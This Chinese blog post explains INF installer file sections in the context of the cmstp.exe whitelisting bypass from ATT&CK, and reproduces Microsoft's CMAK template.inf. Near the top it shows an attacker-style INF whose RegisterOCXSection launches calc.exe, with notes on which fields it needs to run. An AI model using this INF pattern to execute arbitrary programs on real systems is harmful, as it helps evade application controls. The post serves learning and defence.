inf 格式详解_register =chicago-优快云博客

本文链接：https://blog.youkuaiyun.com/sojrs_sec/article/details/105984494

概况

在ATT&CK 战术学习中，我们经常会看到使用inf安装文件进行绕过从而达到命令执行效果的情况，从网络上包括微软官方，发现对inf中涉及到的sections内容不是很完整，sections里面的条目的材料就更少了，本文简单介绍一种方法去了解inf中涉及到的sections及条目

常用inf格式

首先我们来看一个黑客经常利用的inf文档

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Windows\System32\calc.exe
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

这里面涉及到的[DefaultInstall_SingleUser]我在官网上怎么都没找到。虽然能理解大致意思，就是安装程序首先调用DefaultInstall_SingleUser节，该节中的条目又引入子节RegisterOCXSection，执行calc.exe。Strings 节中的字段经过我测试，ServiceName和ShortSvcName是必须存在的。

template.inf模版文件获取

CMAK安装后会形成初始化的模版文件，从该文件中我们可以获取所有信息。template.inf所在目录：c:\program Files\CMAK\support\temlate.inf

在这里插入图片描述以下为template.inf内容

;===========================================================================
;
; All of the customizable sections of this file are in the [Strings] section
; at the bottom.
;
;===========================================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[CmDial32.Dll]

; -------------------------------------------------------------------
; All User Installs
; -------------------------------------------------------------------
[DefaultInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection

; -------------------------------------------------------------------
; Launches the All User postinstall commands
; -------------------------------------------------------------------
[PostInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPostSetupCommands=RunPostSetupCommandsSection

; -------------------------------------------------------------------
; Single User Installs
; -------------------------------------------------------------------
[DefaultInstall_SingleUser]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPreSetupCommands=RunPreSetupCommandsSection
CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM
AddReg = Xnstall.AddReg.Private
RegisterOCXs=RegisterOCXSection

; -------------------------------------------------------------------
; Launches the Single User postinstall commands
; -------------------------------------------------------------------
[PostInstall_Single]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPostSetupCommands=RunPostSetupCommandsSection

; -------------------------------------------------------------------
; This file section sets up the desktop icon GUID and is thus
; only needed on legacy systems.
; -------------------------------------------------------------------
[Xnstall_Legacy]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon

; These section are kept for legacy compatibility but are no longer used.
[Xnstall_Private]
[Xnstall_AllUser]

; -------------------------------------------------------------------
; Section used to uninstall Private user profiles
; -------------------------------------------------------------------
[Remove_Private]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUnInstDestSectionPrivate
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.Private
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection

; -------------------------------------------------------------------
; Section used to uninstall All User profiles 
; -------------------------------------------------------------------
[Remove]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUninstDestSectionAllUsers
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.AllUser
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection

; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or
; after the profile is installed.
;
; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run
; commands before or after the profile is uninstalled.
;
; An example command line is:
; Myprogram.exe /<switches> <options>

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install

[RunPostSetupCommandsSection]
;Commands here will be run After setup finishes

[RunPreUnInstCommandsSection]
;Commands here will be run before Uninstall Begins

[RunPostUnInstCommandsSection]
;Commands here will be run after Uninstall Finishes

; -------------------------------------------------------------------
; These are the registry entries for installation.
; -------------------------------------------------------------------
[Xnstall.AddReg.DesktopIcon]
"HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,,"%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00"
; Please make sure the following three commands are alphabetized by the %Open%, %Delete%,
; and %Settings% entries defined in the Strings section
; the Connect Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%"
; the Delete Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%"
; the Properties Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%"

[Xnstall.AddReg.AllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "%49001%"
"HKLM", "%AppAct%\Mappings","%ServiceName%","","%49001%\%ShortSvcName%.cmp"

[Xnstall.AddReg.Private]
; Single User Mappings is now written in code.
;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp"

; -------------------------------------------------------------------
; These are the registry settings which
; are deleted during uninstall.
; -------------------------------------------------------------------
[Remove.DelReg.AllUser]
"HKLM", "%AppAct%\%ServiceName%"
"HKLM", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\UserInfo\%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"

[Remove.DelReg.Private]
"HKCU", "%AppAct%\%ServiceName%"
"HKCU", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\SingleUserInfo\%ServiceName%"
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"

[CleanDir]
%49001%\%ShortSvcName%

; -------------------------------------------------------------------
; These are the directory specifications.
; -------------------------------------------------------------------

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[CustInstDestSectionSingleUsers]
49000,49001=SingleUser_LDIDSection, 7

[CustUninstDestSectionAllUsers]
49000,49001=XConnMgrLDIDSectionAllUsers, 5

[CustUnInstDestSectionPrivate]
49000,49001=XConnMgrLDIDSectionPrivate, 5

[SingleUser_LDIDSection]
"HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", ""

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[XConnMgrLDIDSectionAllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""

[XConnMgrLDIDSectionPrivate]
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""

[DestinationDirs]
Xnstall.CopyFiles=49001, %ShortSvcName%
Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName%
Xnstall.CopyFiles.ICM=49001
Remove.DelFiles=49001, %ShortSvcName%
Remove.DelFiles.ICM=49001

[SourceDisksNames]
55=, , 0

; -------------------------------------------------------------------
; These are the Prompt Sections
; -------------------------------------------------------------------

[RemoveBeginPromptSection]
Prompt=%BeginPrompt%
ButtonType=YESNO
Title=%UninstallAppTitle%

[RemoveEndPromptSection]
Prompt=%EndPrompt%


[Strings]
; -------------------------------------------------------------------
; These are the non localizable strings...
; -------------------------------------------------------------------
KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles"
AppAct = "SOFTWARE\Microsoft\Connection Manager"

; -------------------------------------------------------------------
; These are the localizable strings...
; -------------------------------------------------------------------
UnexpectedError = "An unexpected error occurred.  Please reboot and try the installation again."

; When you localize these commands (they are the commands for the Desktop Icon on legacy
; platforms) you must make sure to re-alphabetize the Registry add calls above.  Win95
; shows the menus in the order they were added and doesn't alphabetize them for you.
Settings = "P&roperties"
Open = "C&onnect"
Delete = "&Delete"

; -------------------------------------------------------------------
; The following strings are set by the Connection Manager Administration Kit
; Do not change any of the following strings
; -------------------------------------------------------------------
ServiceName=""
ShortSvcName=""
DesktopGUID=""
UninstallAppTitle=""
DesktopIcon=""
PhonebookPath=""
BeginPrompt=""
EndPrompt=""
DisplayLCID=""

[CMAK Status]
InfVersion=5

[Extra Files]

[Merge Profiles]

根据这个模版文件，我们大概知道常用的节及其条目，注意在cmstp.exe调用时，根据单、全用户的不同，选择不同的参数值